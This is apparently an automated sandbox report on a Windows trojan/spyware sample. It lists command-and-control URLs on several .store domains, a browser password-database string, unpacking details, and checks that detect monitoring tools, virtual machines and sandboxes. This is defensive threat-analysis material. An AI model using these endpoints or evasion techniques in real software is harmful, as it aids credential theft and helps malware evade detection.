Source: file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/)
Source: file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/Y
Source: file.exe, 00000000.00000003.2148545581.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.2148545581.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2245519986.000000000593B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2275927536.000000000593B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177399705.0000000001093000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273459745.0000000001021000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000002.2275927536.000000000593B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/&
Source: file.exe, 00000000.00000003.2190157719.0000000005954000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190080162.0000000005954000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191068557.0000000005954000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190345414.0000000005954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/X
Source: file.exe, file.exe, 00000000.00000003.2268091204.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190206884.000000000109E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2245823719.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268195240.0000000001080000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273459745.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273979204.0000000001083000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273459745.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2274099063.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2245823719.00000000010A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api7
Source: file.exe, 00000000.00000003.2190206884.000000000109E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiL
Source: file.exe, 00000000.00000003.2268195240.0000000001080000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273979204.0000000001083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apimYH
Source: file.exe, 00000000.00000002.2273459745.0000000001021000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/m
Source: file.exe, 00000000.00000002.2273459745.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store/
Source: file.exe, 00000000.00000003.2148741597.0000000001024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store/A
Source: file.exe, 00000000.00000003.2148545581.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/api
Source: file.exe, 00000000.00000003.2148545581.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/apizc:
Source: file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2221257590.0000000005938000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221393810.0000000005939000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221240359.0000000005931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221117784.0000000005930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2207111466.000000000596E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2207111466.000000000596E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2207238726.0000000005C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00266022	0_2_00266022
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025104F	0_2_0025104F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024E1A0	0_2_0024E1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00250460	0_2_00250460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002715DC	0_2_002715DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024F755	0_2_0024F755
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027B7B0	0_2_0027B7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025D7F8	0_2_0025D7F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002679B0	0_2_002679B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026F9D0	0_2_0026F9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026AB20	0_2_0026AB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024EC20	0_2_0024EC20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027BCA9	0_2_0027BCA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027F020	0_2_0027F020
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026702F	0_2_0026702F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00245000	0_2_00245000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00241000	0_2_00241000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025D010	0_2_0025D010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025E07E	0_2_0025E07E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00285040	0_2_00285040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00275050	0_2_00275050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002470B0	0_2_002470B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E0EF	0_2_0040E0EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002630E0	0_2_002630E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002840E0	0_2_002840E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027B0F0	0_2_0027B0F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004DB09A	0_2_004DB09A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003FF130	0_2_003FF130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00261100	0_2_00261100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026A112	0_2_0026A112
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00282165	0_2_00282165
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004041D4	0_2_004041D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002491E9	0_2_002491E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024A260	0_2_0024A260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024B240	0_2_0024B240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026D2FD	0_2_0026D2FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002412D5	0_2_002412D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00241328	0_2_00241328
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00269328	0_2_00269328
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00285330	0_2_00285330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026C3A6	0_2_0026C3A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A53BD	0_2_003A53BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003F139A	0_2_003F139A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002683E2	0_2_002683E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026B3D0	0_2_0026B3D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00248460	0_2_00248460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274461	0_2_00274461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002824E0	0_2_002824E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002514CE	0_2_002514CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027A523	0_2_0027A523
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00262520	0_2_00262520
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026A510	0_2_0026A510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026F570	0_2_0026F570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002835F0	0_2_002835F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002565D7	0_2_002565D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C62C	0_2_0040C62C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003FD6E1	0_2_003FD6E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024A720	0_2_0024A720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026F73A	0_2_0026F73A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00282700	0_2_00282700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00263770	0_2_00263770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00283740	0_2_00283740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407734	0_2_00407734
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027C7A0	0_2_0027C7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025E837	0_2_0025E837
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027F800	0_2_0027F800
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002708B1	0_2_002708B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00270887	0_2_00270887
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002698F2	0_2_002698F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00243930	0_2_00243930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00266940	0_2_00266940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00256997	0_2_00256997
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002839C0	0_2_002839C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00254A4C	0_2_00254A4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025FA4F	0_2_0025FA4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402A31	0_2_00402A31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00247AB0	0_2_00247AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024DA80	0_2_0024DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00283A90	0_2_00283A90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00282B10	0_2_00282B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00400B06	0_2_00400B06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025FBA0	0_2_0025FBA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00274BC7	0_2_00274BC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026CBD0	0_2_0026CBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025CC20	0_2_0025CC20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405C56	0_2_00405C56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040FCEE	0_2_0040FCEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026ECE0	0_2_0026ECE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00246D10	0_2_00246D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025ED48	0_2_0025ED48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024BD50	0_2_0024BD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024ADB0	0_2_0024ADB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00283D90	0_2_00283D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00273E24	0_2_00273E24
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00253E45	0_2_00253E45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002C6E5D	0_2_002C6E5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027AE90	0_2_0027AE90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00248EF0	0_2_00248EF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00261EC5	0_2_00261EC5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00270F3E	0_2_00270F3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024DF60	0_2_0024DF60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00279F61	0_2_00279F61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00282FB0	0_2_00282FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00249FF5	0_2_00249FF5

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0024E190 appears 152 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0024C890 appears 69 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9980162617554859

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00272240 CoCreateInstance,

0_2_00272240

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2178129604.000000000593B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191285270.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177813029.0000000005959000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190823829.000000000595A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 2977280 > 1048576

Source: file.exe

Static PE information: Raw size of uzjqkoqp is bigger than: 0x100000 < 0x2ab400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;uzjqkoqp:EW;mvjdyfsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uzjqkoqp:EW;mvjdyfsi:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x2e1e64 should be: 0x2e372e

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: uzjqkoqp
Source: file.exe	Static PE information: section name: mvjdyfsi
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010A4451 push cs; ret	0_3_010A4452
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACF72 push ecx; retf	0_3_010ACF98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010AC489 push ds; ret	0_3_010AC48A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_010ACCB0 push eax; retf	0_3_010ACCF1

Source: file.exe

Static PE information: section name: entropy: 7.9765168628100795

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29F728 second address: 29F72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 414B1C second address: 414B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
